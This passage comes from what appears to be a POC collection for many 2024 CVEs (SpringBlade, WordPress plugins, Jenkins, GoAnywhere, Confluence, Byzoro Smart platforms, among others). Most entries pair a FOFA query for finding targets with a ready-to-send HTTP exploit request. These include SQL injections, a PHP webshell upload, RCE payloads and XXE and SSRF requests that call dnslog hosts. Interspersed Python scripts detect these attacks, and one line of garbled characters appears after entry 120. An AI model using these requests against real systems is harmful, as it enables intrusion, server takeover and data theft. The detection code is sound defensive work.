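    for pair in form_body.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def saml_request_has_dtd(form_body: str) -> bool:
    """CVE-2024-22024 check: base64-decode SAMLRequest and look for a DTD. No XML parser is involved,
    so nothing can be fetched while checking."""
    encoded = form_field(form_body, "SAMLRequest")
    if encoded is None:
        return False
    return DTD_RE.search(base64.b64decode(encoded)) is not None


def external_retrieval_uris(xml_body: str, own_hosts):
    """CVE-2024-21893 check: list ds:RetrievalMethod URIs that would make the appliance fetch from
    anywhere but its own hosts. Documents with a DTD are refused before expat sees them."""
    if DTD_RE.search(xml_body.encode()):
        raise ValueError("signature document carries a DTD; rejecting")
    root = ET.fromstring(xml_body)
    hits = []
    for node in root.iter(f"{{{DS_NS}}}RetrievalMethod"):
        uri = node.get("URI", "")
        parts = urlsplit(uri)
        if parts.scheme in ("http", "https", "ftp", "file") and parts.hostname not in own_hosts:
            hits.append(uri)
    return hits


if __name__ == "__main__":
    print("103 XXE body carries DTD:", saml_request_has_dtd(XXE_FORM_BODY))
    print("102 off-box RetrievalMethod URIs:", external_retrieval_uris(SSRF_SOAP_BODY, {"vpn.corp.example"}))
```

Same-document references such as URI="#cert" are left alone, because XMLDSig uses them legitimately; only fetchable schemes with a foreign host (or no host at all, as with file:) are reported.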
104. Totolink T8 cstecgi.cgi getSysStatusCfg settings information disclosure
CVE-2024-0569
FOFA: title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA: body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
106. SpringBlade dict-biz/list SQL injection
FOFA: body="Saber 将不能正常工作"
The injection is in the parameter name: the request map's keys are used as column names when the WHERE clause is built.
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
107. SpringBlade tenant/list SQL injection
FOFA: body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA: "dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA: header="X-Jenkins"
The upload side sends the CLI arguments; the body below is written as a Python bytes literal, so send the raw bytes it denotes, not the literal text.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

The download side of the same Session returns the command output:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response: @/etc/passwd is expanded into one argument per line of the file, so the first line becomes the COMMAND argument (echoed as the default) and the second line is reported as an excess argument:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
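The byte string in the upload request is the Jenkins PlainCLIProtocol stream: every frame is a 4-byte big-endian payload length (the opcode byte is not counted), one opcode byte (0 = ARG, 1 = LOCALE, 2 = ENCODING, 3 = START) and, for the string frames, a Java writeUTF string. CVE-2024-23897 comes from the args4j parser on the controller expanding any ARG that starts with "@" into the lines of that file. The Python below is an added example, not from the original post or from Jenkins; it rebuilds the page's exact bytes from an argument list and decodes a captured stream back, so the "@file" argument can be picked out of traffic or a proxy log. Opcode names follow the Jenkins enum ordering as observed in the page's bytes.

```python
import struct

# Opcode ordinals of hudson.cli.PlainCLIProtocol.Op for the client->server (upload) direction.
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}

# The upload body from entry 109 of this page, as raw bytes.
PAGE_UPLOAD_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
                    b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
                    b"\x00\x00\x00\x05\x02\x00\x03GBK"
                    b"\x00\x00\x00\x07\x01\x00\x05en_US"
                    b"\x00\x00\x00\x00\x03")


def java_utf(text: str) -> bytes:
    """DataOutputStream.writeUTF: 2-byte big-endian length followed by the (modified) UTF-8 bytes.
    Plain UTF-8 is identical except for NUL and non-BMP characters, which never occur in CLI args here."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op: int, payload: bytes = b"") -> bytes:
    """One frame: int32 length of the payload (the opcode byte is NOT counted), opcode byte, payload."""
    return struct.pack(">I", len(payload)) + bytes([op]) + payload


def build_upload(args, encoding="UTF-8", locale="en_US") -> bytes:
    """Serialize a CLI invocation the way jenkins-cli.jar does in -http (remoting=false) mode."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding))
    body += frame(OP_LOCALE, java_utf(locale))
    return body + frame(OP_START)


def parse_upload(data: bytes):
    """Decode a frame stream into [(opname, text_or_None), ...]; raises on a truncated stream."""
    frames, pos = [], 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        op = data[pos + 4]
        payload = data[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        text = None
        if length >= 2:
            (n,) = struct.unpack(">H", payload[:2])
            text = payload[2:2 + n].decode("utf-8")
        frames.append((OP_NAMES.get(op, "OP%d" % op), text))
        pos += 5 + length
    if pos != len(data):
        raise ValueError("trailing bytes after last frame")
    return frames


def file_expansion_args(frames):
    """Arguments that args4j would expand from a file on the controller: the CVE-2024-23897 sink."""
    return [text for name, text in frames if name == "ARG" and text and text.startswith("@")]


if __name__ == "__main__":
    for name, text in parse_upload(PAGE_UPLOAD_BODY):
        print(name, text)
    print("file reads requested:", file_expansion_args(parse_upload(PAGE_UPLOAD_BODY)))
```

The decoded stream for the page's request is ARG "help", ARG "@/etc/passwd", ENCODING "GBK", LOCALE "en_US", START; any ARG beginning with "@" in a POST to /cli?remoting=false is the thing to alert on, regardless of which command precedes it.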
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA: body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
The ..;/ segment gets past the admin-console authentication filter and reaches the initial account setup wizard, which allows creating an administrator account.
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
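What makes the GoAnywhere request work is a mismatch between two views of the same path: a filter matching the raw URL sees /goanywhere/images/..., a public prefix, while Tomcat strips the ";"-delimited path parameter and resolves ".." before dispatch, so the request lands on the wizard. Entry 101 is the same shape of mismatch with a plain ../ plus a ";" that reaches a shell. The Python below is an added example, not from the original post or from either vendor; it resolves a path the way the target does and reports when a naive prefix check and the resolved path disagree. The prefixes are assumptions; the two paths are the page's own.

```python
import re
from urllib.parse import unquote

# Characters that reach a shell when the final segment is interpolated into a command (entry 101).
SHELL_META = re.compile(r"[;|&`$]")

# The two paths from this page.
GOANYWHERE_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
IVANTI_PATH = "/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw"


def normalize_path(raw_path: str, strip_path_params: bool = True) -> str:
    """Resolve a request path the way the target does before dispatch: percent-decode, optionally drop
    ';'-delimited path parameters from each segment (servlet containers such as Tomcat do), then collapse
    '.' and '..'. A filter that matches the raw string sees a different path than the handler does."""
    path = unquote(raw_path.split("?", 1)[0])
    resolved = []
    for segment in path.split("/"):
        if strip_path_params:
            segment = segment.split(";", 1)[0]       # '..;' becomes '..'
        if segment in ("", "."):
            continue
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


def escapes_prefix(raw_path: str, allowed_prefix: str, strip_path_params: bool = True) -> bool:
    """True when raw_path passes a naive startswith(allowed_prefix) check but resolves outside it."""
    if not raw_path.startswith(allowed_prefix):
        return False
    return not normalize_path(raw_path, strip_path_params).startswith(allowed_prefix)


def shell_metachars_in_path(raw_path: str) -> bool:
    """True when the decoded path carries a shell metacharacter (the ';' hidden as %3b in entry 101)."""
    return SHELL_META.search(unquote(raw_path.split("?", 1)[0])) is not None


if __name__ == "__main__":
    print(normalize_path(GOANYWHERE_PATH))                        # /goanywhere/wizard/InitialAccountSetup.xhtml
    print(normalize_path(IVANTI_PATH, strip_path_params=False))   # /api/v1/license/keys-status/;curl a4xs0nop.dnslog.pw
```

Note the strip_path_params switch: with it off, "..;" is just an odd directory name and the GoAnywhere path looks harmless, which is exactly the blind spot a raw-string filter has; for the Ivanti backend (not a servlet container) the ";" is kept, so the resolved last segment still shows the injected command.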

111. WordPress HTML5 Video Player plugin SQL injection
CVE-2024-1061
FOFA: "wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
112. WordPress NotificationX plugin SQL injection
CVE-2024-1698
FOFA: body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA: "/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
114. WordPress MasterStudy LMS plugin SQL injection
FOFA: body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
115. WordPress Bricks Builder theme <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the site's nonce value from the front page
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command (the output is returned inside the exception message)
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket plugin file upload
FOFA: body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

({{rand8}} is a template placeholder for a random file name; the file content is omitted in the source.)

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 to 7.10.0
FOFA: body="/wp-content/plugins/LayerSlider/"
The injection goes through the id[where] array key, which the plugin concatenates into its WHERE clause.
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
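Across the SpringBlade entries (105 to 107) and the WordPress ones (111, 112, 114, 117) the injection sits in different places: in the parameter name (SpringBlade turns request keys into column names), in a JSON value that closes a backtick-quoted column (NotificationX), in a PHP array key (id[where], LayerSlider) and in plain values. The Python below is an added example, not from the original post or from any of these projects: one scanner that decodes query, form and JSON parameters and checks keys as well as values for the error-based (updatexml/concat) and time-based (sleep) primitives these POCs use. The samples are the page's own requests plus two constructed benign ones; the regular expression is a practical heuristic, not a complete SQL grammar.

```python
import json
import re
from urllib.parse import unquote_plus, urlsplit

# Primitives used by the error-based and time-based POCs on this page, plus the comment and
# identifier-quote sequences they use to break out of the surrounding SQL.
SQLI_RE = re.compile(
    r"\b(?:updatexml|extractvalue|sleep|benchmark|concat)\s*\("      # function call
    r"|\b(?:and|or)\s+\(?\s*select\b"                                # boolean condition on a subselect
    r"|--\s|/\*|`",                                                  # comment or backtick breakout
    re.IGNORECASE,
)

# Requests copied from this page.
SPRINGBLADE = "/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1"
H5VP = "/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
LAYERSLIDER = ("/wp-admin/admin-ajax.php?action=ls_get_popup_markup"
               "&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq")
MASTERSTUDY = ("/?rest_route=/lms/stm-lms/order/items&author_id=1"
               "&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071")
NOTIFX_BODY = '{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}'
# Constructed benign requests for comparison.
BENIGN = "/?rest_route=/h5vp/v1/view/1&id=1&order=date_desc"
BENIGN_BODY = '{"nx_id": "1","type": "clicks"}'


def iter_params(target, body=None, content_type=""):
    """Yield (location, key, value) for query-string, form and JSON parameters. Keys are yielded as
    well as values: SpringBlade's injection lives in the parameter name, because the request map's keys
    end up as column names in the generated WHERE clause."""
    pairs = [("query", p) for p in urlsplit(target).query.split("&") if p]
    if body and "json" in content_type:
        for key, value in json.loads(body).items():
            yield "json", key, str(value)
    elif body:
        pairs += [("form", p) for p in body.split("&") if p]
    for location, pair in pairs:
        key, _, value = pair.partition("=")
        yield location, unquote_plus(key), unquote_plus(value)


def sqli_findings(target, body=None, content_type=""):
    """Return [(location, 'key' or 'value', parameter_name), ...] for every parameter matching SQLI_RE."""
    findings = []
    for location, key, value in iter_params(target, body, content_type):
        for where, text in (("key", key), ("value", value)):
            if SQLI_RE.search(text):
                findings.append((location, where, key))
    return findings


if __name__ == "__main__":
    for label, request in (("SpringBlade", SPRINGBLADE), ("HTML5 Video Player", H5VP),
                           ("LayerSlider", LAYERSLIDER), ("MasterStudy", MASTERSTUDY), ("benign", BENIGN)):
        print(label, sqli_findings(request))
    print("NotificationX", sqli_findings("/wp-json/notificationx/v1/analytics", NOTIFX_BODY, "application/json"))
```

The SpringBlade case is the one most scanners miss: the value is a harmless "1" and only the key is hostile, so any WAF rule or log query that inspects values alone reports nothing.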

118. Beijing Baichuo Smart (北京百绰智能) S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA: title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then request /home/src.php; the txt_path field sets the server-side destination of the upload.
119. Beijing Baichuo Smart (北京百绰智能) S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA: title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart (北京百绰智能) S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA: title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The file is written to /upload/2.php.
1 F3 b4 z: H: y0 I1 c- S$ z. ~! D% q6 X" W1 a1 }: j
121. Beijing Byzoro Smart S42 Management Platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Byzoro Smart S200 Management Platform: SQL injection in /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the base64-encoded SQL statement; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system: arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
